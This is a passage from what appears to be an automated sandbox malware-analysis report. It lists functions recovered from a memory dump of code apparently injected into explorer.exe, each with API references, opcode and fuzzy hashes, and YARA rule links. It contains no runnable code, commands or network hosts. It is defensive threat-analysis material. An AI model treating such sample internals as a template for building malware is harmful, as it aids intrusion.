                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                          • String ID:
                                                          • API String ID: 2574049805-0
                                                          • Opcode ID: 4e586b5474c380d6360cdf1ebd0b926f83973896e49c3567526ef87c4b0a309a
                                                          • Instruction ID: 1f8e84681b85f69ce6fa4f759ea6a600ed7f49b0b6ded0ab13f4b6bab4437632
                                                          • Opcode Fuzzy Hash: 4e586b5474c380d6360cdf1ebd0b926f83973896e49c3567526ef87c4b0a309a
                                                          • Instruction Fuzzy Hash: 5341C6B3A0070286DB24FF29D84136EB7A1EB94BE8F144225CB694B3D8EB74C452C791
                                                          Function 02F7B2C4 Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _fileno.LIBCMT ref: 02F7B2E1
                                                            • Part of subcall function 02F81CCC: _errno.LIBCMT ref: 02F81CD5
                                                            • Part of subcall function 02F81CCC: _invalid_parameter_noinfo.LIBCMT ref: 02F81CE0
                                                          • _errno.LIBCMT ref: 02F7B2F1
                                                          • _errno.LIBCMT ref: 02F7B30D
                                                          • _isatty.LIBCMT ref: 02F7B36E
                                                          • _getbuf.LIBCMT ref: 02F7B37A
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                          • String ID:
                                                          • API String ID: 2574049805-0
                                                          • Opcode ID: 7de11f037516aaad5864b9fd072e1c791a7cefa466f71dd2d1a5169e14d227a2
                                                          • Instruction ID: 092341b964100696dafca8b3407ad35addb1e77daa24b472db76d58ee5a076f7
                                                          • Opcode Fuzzy Hash: 7de11f037516aaad5864b9fd072e1c791a7cefa466f71dd2d1a5169e14d227a2
                                                          • Instruction Fuzzy Hash: 5741C172A10B448ADB68AF29D85036D7761E796FDCF144327CB69473E4DB38C492CB90
                                                          Function 02F75E90 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                          • String ID:
                                                          • API String ID: 2166016019-0
                                                          • Opcode ID: 44b8f896a8d54861d44ac905f2f789a1a067f62a0f6920c99ad38e30146aa7d8
                                                          • Instruction ID: 39e77ae258261975cabe55ab80ff459e50c2c43e24137282b2d4c23cf4087bb2
                                                          • Opcode Fuzzy Hash: 44b8f896a8d54861d44ac905f2f789a1a067f62a0f6920c99ad38e30146aa7d8
                                                          • Instruction Fuzzy Hash: 0E31E632528B44CBDB609F19E44875ABBB0F786784FA05126FB8A47B68CB7DC485CF00
                                                          Function 02F75FB0 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                          • String ID:
                                                          • API String ID: 2166016019-0
                                                          • Opcode ID: 1c8f4f5f8584f980008812adca2767ac4d4628ddf13766fc1b0f856032cb8d40
                                                          • Instruction ID: f1cba228b37ad478ce2c624c9c311cce1c3822e12a009af800d05536d1dfd58d
                                                          • Opcode Fuzzy Hash: 1c8f4f5f8584f980008812adca2767ac4d4628ddf13766fc1b0f856032cb8d40
                                                          • Instruction Fuzzy Hash: E931F872518B44CADB60DF15E44875ABBB4F785BC4F605126EB8A83B68CB7EC488CF00
                                                          Function 02F840A4 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: 54d7f30ec2553d32a8f902d3909a3ca65a2760b7a04fd48234be5dc0ab105a37
                                                          • Instruction ID: 510aeeeab588469ee60cfbcb157e50b552adf0f8d9232e2eb5427452ea8864e6
                                                          • Opcode Fuzzy Hash: 54d7f30ec2553d32a8f902d3909a3ca65a2760b7a04fd48234be5dc0ab105a37
                                                          • Instruction Fuzzy Hash: 80F06D62718A8A89EE057B98C89036CB6629BB0FF5F914327C729073E1C77C4440CB21
                                                          Function 02F7FC74 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _amsg_exit_getptd
                                                          • String ID: !'
                                                          • API String ID: 4217099735-3450090516
                                                          • Opcode ID: 2417a18c8650e07f4c4f8b60343deee19543555342068bdf1caac308ae8dd088
                                                          • Instruction ID: 291264dc507c1b0699aac827e809322717ba5b0c5c372bfcae2878c8b5f46919
                                                          • Opcode Fuzzy Hash: 2417a18c8650e07f4c4f8b60343deee19543555342068bdf1caac308ae8dd088
                                                          • Instruction Fuzzy Hash: 8CF0FE21602541C2EB18BB55DD54BB87262FB99BC4F4C033ACF0957791DF28D544DB11
                                                          Function 02F79E0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno_invalid_parameter_noinfo
                                                          • String ID: B
                                                          • API String ID: 2959964966-1255198513
                                                          • Opcode ID: 0a433b95e639ae02d84693d8af4ee103dc8925a725b6d2abd17b36db0ad37138
                                                          • Instruction ID: 4aadb17223dffa6db4aa4911d6cf80f2eba02d0e0704797344a25b591f6dc2d5
                                                          • Opcode Fuzzy Hash: 0a433b95e639ae02d84693d8af4ee103dc8925a725b6d2abd17b36db0ad37138
                                                          • Instruction Fuzzy Hash: 7D218E73B00A6489EB12DBB4EA407DC3776A714BE8F440223EF5A1AB88CBB48441C720